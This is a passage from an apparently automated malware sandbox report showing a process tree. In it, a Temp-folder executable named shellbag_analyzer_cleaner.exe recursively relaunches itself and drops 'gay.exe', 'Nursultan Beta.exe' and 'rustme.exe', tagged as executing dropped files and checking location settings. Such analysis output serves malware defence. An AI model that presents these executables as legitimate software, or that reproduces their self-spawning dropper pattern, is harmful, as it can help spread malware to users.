C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"27⤵PID:3584
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"28⤵PID:5840
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"29⤵PID:4396
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"30⤵PID:1728
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"30⤵PID:3116
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"29⤵PID:5556
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"28⤵PID:4936
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4936 -s 75229⤵PID:692
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"27⤵PID:5012
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"26⤵PID:408
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"25⤵PID:5144
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"24⤵PID:5152
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"23⤵PID:2032
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"22⤵PID:5320
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"21⤵PID:6064
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"20⤵PID:5872
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"20⤵PID:4344
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"19⤵PID:2140
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"19⤵PID:4976
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"19⤵PID:5496
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"18⤵PID:3928
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"19⤵PID:5688
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"20⤵PID:2804
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"21⤵PID:2652
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"22⤵PID:5460
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"23⤵PID:5844
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"24⤵PID:5600
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"25⤵PID:5124
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"26⤵PID:5320
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"27⤵PID:3360
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"28⤵
- Checks computer location settings
PID:3116 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"29⤵PID:948
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"30⤵PID:5188
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"31⤵PID:5244
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"31⤵PID:1736
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"30⤵PID:1904
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"29⤵PID:5936
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"28⤵PID:3840
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"27⤵PID:5244
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"26⤵PID:4976
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"25⤵PID:5908
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"24⤵PID:5784
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"23⤵PID:2892
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"22⤵PID:5600
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"21⤵PID:2144
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"20⤵PID:5012
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"19⤵PID:5348
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"18⤵PID:2804
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"18⤵PID:916
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"17⤵PID:5776
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"17⤵PID:4512
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"17⤵PID:1736
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"16⤵PID:2552
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"16⤵PID:656
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"16⤵PID:5548
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"15⤵PID:3644
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"15⤵PID:3596
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"15⤵PID:4360
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"14⤵PID:3392
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"15⤵PID:2416
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"16⤵PID:5932
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"17⤵
- Checks computer location settings
PID:1644 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"18⤵PID:5540
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"18⤵PID:5756
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"17⤵PID:3964
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"16⤵PID:4636
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"15⤵PID:5624
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"14⤵PID:5420
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"14⤵PID:1732
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"13⤵PID:5640
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"14⤵PID:2944
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"15⤵PID:6112
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"16⤵PID:3448
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"17⤵PID:5804
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"18⤵PID:5784
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"19⤵PID:4624
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"19⤵PID:1104
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"18⤵PID:5920
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"17⤵PID:5500
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"16⤵PID:5756
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"15⤵PID:6096
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"14⤵PID:6116
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"13⤵PID:2344
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"13⤵PID:5136
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"12⤵PID:3520
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"13⤵PID:4752
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"14⤵PID:4140
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"15⤵PID:6052
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"16⤵PID:5180
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"17⤵PID:5148
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"18⤵PID:4656
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"19⤵PID:404
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"20⤵PID:6104
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"21⤵PID:4148
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"22⤵
- Checks computer location settings
PID:2140 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"23⤵PID:2008
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"24⤵PID:3556
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"24⤵PID:5700
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"23⤵PID:3168
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"22⤵PID:3636
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"21⤵PID:5180
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"20⤵PID:5304
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"19⤵PID:3684
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"18⤵PID:4368
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"17⤵PID:4984
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"16⤵PID:544
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"15⤵PID:5840
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"14⤵PID:3840
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"13⤵PID:5660
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"12⤵PID:6068
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"12⤵PID:1736
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"11⤵PID:4360
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"11⤵PID:4004
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"11⤵PID:1576
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"10⤵PID:5716
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"11⤵PID:2888
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"12⤵PID:5392
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"13⤵
- Checks computer location settings
PID:6096 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"14⤵
- Checks computer location settings
PID:3736 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"15⤵PID:3636
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"15⤵PID:5804
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"14⤵PID:4976
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"13⤵PID:4884
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"12⤵PID:5548
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"11⤵PID:5620
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"10⤵PID:6080
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"10⤵PID:5932
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"9⤵PID:628
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"10⤵PID:5676
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"11⤵PID:5484
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"12⤵PID:5292
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"13⤵PID:2300
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"14⤵PID:5708
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"15⤵PID:5548
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"16⤵PID:5384
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"17⤵PID:3752
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"18⤵PID:5660
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"19⤵PID:2552
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"20⤵PID:4396
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"21⤵PID:6008
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"22⤵PID:5544
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"22⤵PID:408
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"21⤵PID:6012
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"20⤵PID:5548
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"19⤵PID:2344
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"18⤵PID:6000
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"17⤵PID:3684
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"16⤵PID:2888
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"15⤵PID:2112
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"14⤵PID:5712
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"13⤵PID:5336
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"12⤵PID:5420
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"11⤵PID:2344
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"10⤵PID:3224
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"9⤵PID:6044
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"9⤵PID:5816
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"8⤵PID:5924
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"9⤵PID:5448
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"10⤵PID:1592
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"11⤵PID:3596
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"12⤵PID:6112
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"12⤵PID:2012
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"11⤵PID:452
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"10⤵PID:6064
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"9⤵PID:3964
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"8⤵PID:5732
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"8⤵PID:5384
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"7⤵
- Executes dropped EXE
PID:1420
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"7⤵
- Executes dropped EXE
PID:1592
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"7⤵
- Executes dropped EXE
PID:408
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"6⤵
- Executes dropped EXE
PID:5688 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"7⤵
- Executes dropped EXE
PID:5776 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"8⤵PID:5472
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"9⤵PID:3840
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"10⤵PID:5500
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"11⤵PID:5840
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"12⤵PID:5184
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"13⤵PID:5908
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"14⤵PID:5348
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"14⤵PID:5716
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"13⤵PID:4876
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"12⤵PID:4800
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"11⤵PID:5400
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"10⤵PID:4540
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"9⤵PID:2140
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"8⤵PID:2144
-
-
-
